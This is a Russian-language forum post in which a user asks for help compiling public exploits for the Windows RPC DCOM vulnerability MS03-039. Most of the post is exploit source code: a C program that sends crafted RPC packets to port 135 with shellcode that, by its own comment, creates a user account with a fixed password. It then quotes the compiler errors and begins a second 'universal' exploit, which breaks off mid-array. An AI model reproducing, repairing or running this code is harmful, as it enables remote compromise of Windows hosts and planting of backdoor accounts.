|
не могу скомпилить сплоит :(
вопщем надо скомпилить сплоит ms03-039
взял с милворма сначало этот: --------------------------------------------------------------------- /* RPCDCOM2.c ver1.1 copy by FLASHSKY flashsky at xfocus.org 2003.9.14 */ #include <stdio.h> #include <winsock2.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8, 0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00 ,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2 ,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00 ,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00 ,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4 ,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00 ,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00 ,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00 ,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00 ,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00 ,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00 ,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00 ,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11 ,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00 ,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57 ,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00 ,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85 ,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00 ,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00 ,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00 }; unsigned char sccnsp3sp4[]= "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\ x00" "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\ x5C\x00" "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\ x46\x00\x38\x6e" "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\ x1b\x8d\xa0\x01" "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\ x99\x01\x80\x30" "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\ xf2\xe1\xea\xd2" //SHELLCODE From SAM ,THANKs ! //Add user SST,password is 557, "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\ x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\ x99\x99\x12\x6D" "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\ x13\x97\x71\x3C" "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\ xEA\x71\x0F\x99" "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\ xD9\xA9\x14\xD9" "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\ xFD\xF1\xB9\xB6" "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\ xF1\xF7\xFC\xED" "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\ xB9\xAC\xAC\xAE" "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\ xFC\xED\xB9\x12" "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\ x99\x99\xF1\xED" "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\ xEB\xF1\xF0\xEA" "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\ xF1\xF5\xFE\xEB" "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\ x55\xC9\xC8\x66" "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\ x12\xF5\xBD\x81" "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\ x12\xC3\xB9\x9A" "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\ xAA\x59\x35\xA3" "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\ xBD\x8D\xEC\x78" "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\ x9A\x44\x12\x9D" "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\ xC2\x5B\x9D\x99" "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\ x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\ x31\x21\x99\x99" "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\ x66" "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\ xce\xaf\x1a\xce" "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\ xd6\xd7\xc3\xc6" "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\ x77\x6c\xe6\xd7" "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\ x6b\xc3\x6c\xc4" "\x7f\x19\x95\xd5\x17\x53\xe6\x6a" "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\ x90" // "\x90\x90\x90\x90\x90\x90\x90\x90" "\x77\xe0\x43\x00\x00\x10\x5c\x00" "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26 "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic //"Utilization of released heap structure and exploit of universal Heap overflow in windows ". "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\ x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\ xBD\x9D\xC9\x14" "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\ x99\x99\xC9\xAA" "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\ x99\xC9\x66\xCF" "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\ xAC\x99\xAE\x99" "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\ x99\xEA\x99\xF1" "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\ xB9\x99\xF1\xF7" "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\ x29\x99\x99\x99" "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\ xC9\xC9\xC9\xCA" "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\ xC0\xAA\x59\xC9" "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\ x99\xB9\x99\xF1" "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\ xEB\x99\xF1\xF8" "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\ x99\xF1\xF0\x99" "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\ xF1\xEC\x99\xE9" "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\ xFA\x99\xF8\x99" "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\ x99\xFC\x99\x12" "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\ x1D\xBD\x91\x98" "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\ xBD\xB1\x98\x99" "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\ xCC\xCF\xCE\x12" "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\ x12\xD3\x81\x12" "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\ xAA\x66\x65\xAA" "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\ x6B\xA2\xE5\xBD" "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\ x12\xC3\x85\x9A" "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\ xC6\xC7\xC4\xC2" "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\ x59\xE1\x95\x12" "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\ xD9\xAD\x12\x31" "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\ xEC\x64\x66\x66" "\x04\x04\x00\x70\x00\x04\x40" "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\ xa0\x04\x00" "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71" ; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00 ,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00 }; void main(int argc,char ** argv) { WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); printf("Code by FlashSky,Flashsky xfocus org\n"); printf("Welcome to our Site: http://www.xfocus.org\n"); printf("Welcome to our Site: http://www.venustech.com.cn\n"); if(argc!=2) { printf("%s targetIP \n",argv[0]); printf("for cn w2k server sp3/sp4+ms03-26\n"); } if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return; } len1=sizeof(request1); len=sizeof(sccnsp3sp4); if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==S OCKET_ERROR) { printf("Connect failed.Error:%d",WSAGetLastError()); return; } memcpy(buf2,request1,sizeof(request1)); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4)); len1=len1+sizeof(sccnsp3sp4); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERRO R) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } len=recv(sock,buf1,1000,NULL); if (send(sock,buf2,len1,0)==SOCKET_ERROR) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } // len=recv(sock,buf1,1024,NULL); } /* */ // milw0rm.com [2003-09-20] --------------------------------------------------------------------- компилятор мне вот чё выдал: error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [72]' to 'const char *' Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast error C2664: 'recv' : cannot convert parameter 2 from 'unsigned char [4096]' to 'char *' Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [4096]' to 'const char *' Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast исравить я не смог :( потом попробовал скомпилить этот сплоит (тоже с милворма): |
----------------------------------------------
/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */ /* Must be used with the associated shell */ /* */ /* This exploit works against unpatched systems (MS03-039) */ /* And cause a Denial of Service on patched systems (rpc3) */ #include <stdio.h> #include <winsock2.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> FILE *fp1; unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8, 0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00 ,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2 ,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00 ,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00 ,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4 ,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00 ,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00 ,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00 ,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00 ,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00 ,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00 ,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00 ,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00 ,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11 ,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00 ,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57 ,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00 ,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00 ,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85 ,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00 ,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00 ,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00 ,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 